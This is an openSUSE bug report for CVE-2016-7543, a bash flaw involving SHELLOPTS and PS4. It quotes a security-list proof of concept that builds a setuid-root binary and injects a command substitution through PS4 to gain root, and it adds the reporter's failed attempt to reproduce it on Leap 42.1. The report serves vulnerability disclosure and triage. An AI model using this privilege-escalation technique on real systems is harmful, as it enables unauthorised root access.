Bug ID | 1001299 |
---|---|
Summary | VUL-0: CVE-2016-7543: bash SHELLOPTS+PS4 |
Classification | openSUSE |
Product | openSUSE Distribution |
Version | Leap 42.1 |
Hardware | Other |
OS | Other |
Status | NEW |
Severity | Normal |
Priority | P5 - None |
Component | Security |
Assignee | security-team@suse.de |
Reporter | mikhail.kasimov@gmail.com |
QA Contact | qa-bugs@suse.de |
Found By | --- |
Blocker | --- |
Reference: http://seclists.org/oss-sec/2016/q3/617 =================== The recent bash 4.4 patched an old attack vector regarding specially crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries using system()/popen(). https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html "nn. Shells running as root no longer inherit PS4 from the environment, closing a security hole involving PS4 expansion performing command substitution." # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }' # chmod 4755 ./test # ls -l ./test -rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test # exit $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test uid=0(root) Sat Sep 10 18:06:36 WET 2016 Sorry Tavis :P ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. =================== I've tried to reproduce this issue on release bash version in 42.1 -- 4.2.47(1)-release (x86_64-suse-linux-gnu) -- but first line (gcc -xc...) returned command line dialogue instead of test-file. So, please, try to reproduce this on your own side this issue. Thanks!